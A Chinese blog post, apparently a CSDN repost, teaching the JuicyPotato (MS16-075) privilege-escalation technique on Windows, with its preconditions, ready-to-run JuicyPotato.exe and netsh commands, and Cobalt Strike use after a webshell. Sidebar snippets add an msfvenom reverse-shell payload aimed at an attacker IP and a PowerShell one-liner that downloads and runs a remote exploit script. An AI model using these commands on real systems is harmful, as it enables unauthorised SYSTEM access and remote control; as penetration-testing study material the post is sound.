烂土豆Juicypotato【MS16-075】提权

最新推荐文章于 2023-03-08 09:46:22 发布
最新推荐文章于 2023-03-08 09:46:22 发布
阅读量600 收藏
点赞数
文章标签: 网络 服务器 windows
原文链接:https://blog.csdn.net/god_zzZ/article/details/106334702
版权
本文探讨了如何利用JuicyPotato工具进行权限提升,通过NTLM漏洞和特定权限条件,如SeImpersonate/SeAssignPrimaryToken。关键步骤包括检查用户权限、RPC配置、选择合适的CLSID及端口,同时强调了操作系统、DCOM支持和远程RPC登录的重要性。
摘要由CSDN通过智能技术生成

原理:

攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机!

Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继将不再起作用。但是,跨协议攻击(例如HTTP-> SMB)仍然可以正常使用!

使用条件

1、查看当前用户权限,是否符合要求

whoami /all 
whoami /priv

如果开启SeImpersonate权限,juicypotato的参数可以使用-t t
如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u

如果均开启,可以选择-t *
如果均未开启,那么无法提权

2、查看RPC默认端口是否为135
如果被修改(例如为111),juicypotato的参数可以使用-n 111

如果系统禁用了RPC,并不是一定无法提权,需要满足如下条件:

找到另一系统,能够以当前用户的权限进行远程RPC登录,此时juicypotato的参数可以使用-k

例如Win7、WIn8系统,默认配置下,允许135端口的入站规则即可进行远程RPC登录

添加防火墙规则允许135端口入站的命令如下:

netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow

3、根据操作系统选择可用的CLSID

参考列表

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

例如测试系统win7 ,选择CLSID为 {555F3418-D99E-4E51-800A-6E89CFD8B1D7}

4、选择一个系统未占用的端口作为监听端口

例如,最终参数如下:

JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

表示开启SeImpersonate权限创建进程,监听端口1111,使用的CLSID为{8BC3F05E-D86B-11D0-A075-00C04FB68820}
在这里插入图片描述

限制条件

经过以上的分析,Juicy Potato的限制条件如下:

  • 需要支持SeImpersonate或者SeAssignPrimaryToken权限
  • 开启DCOM
  • 本地支持RPC或者远程服务器支持PRC并能成功登录
  • 能够找到可用的COM对象

一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。一般大多数的服务型账户IIS、MSSQL等,有这个权限,大多数用户级的账户没有这个权限,这些都可以whoami /priv 试一下看看有没有模仿权限。

在Cobaltstrike中使用Juicypotato提权

在Cobaltstrike中使用Juicypotato提取,是使用DLL注入的方式执行Juicypotato实现权限提升

但是缺陷比较明显,只能使用默认的CLSID({4991d34b-80a1-4291-83b6-3328366b9097})进行提权,如果想使用其他CLSID请参考命令行等执行方法

下载并解压reflectiveJuicyPotato.zip,在Cobaltstike中选择脚本管理器–>load加载juicypotato.cna脚本

随后我们在提权模块即可发现多了一个JuicyPotato

违规用户456121984651
关注
ms16-016提权
qq_54713392的博客
05-08 1234
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
〖教程〗Ladon提权MS16-135参数版(WIN7-2016)
K8哥哥
08-08 1302
漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地提权 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
土豆ms16-075提权
orange777
02-23 1205
环境信息 目标机: server2008 192.168.111.4 攻击机: kali 192.168.111.3 目标上线 首先通过制作html后门使目标机上线 可以发现当前目标机用户为administrator 通过当前会话框执行shell systeminfo查看当前系统信息,打补丁情况 把该信息粘贴到http://bugs.hacking8.com/tiquan/查看可以利用的漏洞 在GitHub上查找对应cs里土豆的插件,加载到cs中 https://github.com
Windows土豆提权复现(MS16-075)
最新发布
oiadkt的博客
03-08 2376
Windows土豆提权复现(MS16-075)
ms16-075提权复现
qq_42307546的博客
03-24 628
.CVE-2016-3225(MS16-075提权 1.漏洞描述 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的 应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转 发请求的方式来修复此漏洞。 注:土豆(Rotten Po
土豆 (ms16-075) 提权方法
内心不种满鲜花就会长满杂草
03-11 1万+
所谓的土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
土豆Juicypotato提权原理和利用
热门推荐
god_Zeo的安全博客
05-25 1万+
0x00 Potato(土豆提权的原理: 所谓的土豆提权就是俗称的MS16-075 可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。 一、简单的原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继
提权实战:MS16-075漏洞利用与Meterpreter反弹
本次实战笔记记录了一次关于利用MS16-075漏洞进行提权的过程,该漏洞Windows SMB服务器的特权提升漏洞,其CVE编号为CVE-2016-3225。攻击者通过转发其他服务的身份验证请求,能够在SMB服务中触发漏洞,进而实现权限...
MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包
publicStr的博客
08-01 1591
0x01 MS16-023提权 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invok...
MS16-016漏洞复现
qq_45440239的博客
06-01 1878
复现MS16-016漏洞
juicy_2:适用于Win10的juicypotato> 1803和Win Server 2019
03-04
juicy_2 适用于Win10的JuicyPotato> 1803和Win Server 2019 请先阅读我的博客文章: : 免责声明: 这只是对JuicyPotato的快速而肮脏的修改,以测试有效的CLSID并模拟它们(您需要假冒特权)以用于较新的Windows 10和Windows Server 2019平台。 (我知道,此版本被Defender和其他AV捕获,但是对代码进行了一些修改,很容易绕开) 强制性要求是可以在您控制的转发器计算机上重定向端口135的流量。 随意改进代码,我对这种东西太懒了。 要测试CLSID: socat侦听器的juicy_2 -z -x [ip] -l [假氧化解析器端口] -n [本地RPC服务器端口] -c [要测试的CLSID] 例子: 受害人: juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {9
ms16-075提权
lansefly1990的专栏
02-27 2886
利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester 利用ms16-135内核漏洞提权, powershell -nop -exec bypass -c "& {Import-Module 'C:\Users ...
蓝屏重启——事件10016解决
a113333333的博客
07-24 4062
首先打开事件查看器,进入Windows日志->系统,查看错误日志 注意该信息中的APPID:8BC3F05E-D86B-11D0-A075-00C04FB68820,CLSID:8BC3F05E-D86B-11D0-A075-00C04FB68820以及用户:Users(还有可能是Administrators、Local Service等等) 打开注册表,搜索(Ctrl+...
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5468
超详细的windows提权姿势汇总
com组件 的劫持_常用危险COM组件CLSID集合_护卫神
weixin_33108105的博客
01-12 492
CLASSID,在Windows系统中唯一表示一个组件(一般在Windows注册表目录HKEY_CLASSES_ROOT\CLSID 中),在护卫神·入侵防护系统中,用于对IIS辅助的运行控制进行辨别,如下图:另外,在【护卫神·防篡改系统】专业版中,注册表监控模块也可以用到此项,请妥善设置。以下是整理的部分特征(注意输入的格式哦):--------------------------------...
服务器提权常见方法介绍
seek_2022的博客
04-15 7055
文章目录一、提权常见的方法 很多时候渗透测试人员,在做渗透的时候,拿到了网站权限,会发现,网站的权限调用的CMD命令,其实只是网站的权限,并不是服务器管理员权限,这个时候就需要去想办法提升自己的权限,只有自己的权限够了,才可以去更好的做内网测试。 一、提权常见的方法 Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权、组策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。 1、windows/linux系统漏洞提权; 查看windows打了什么补丁,然后去网上找存在什么样的漏
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
weixin_46626159的博客
03-21 1032
土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值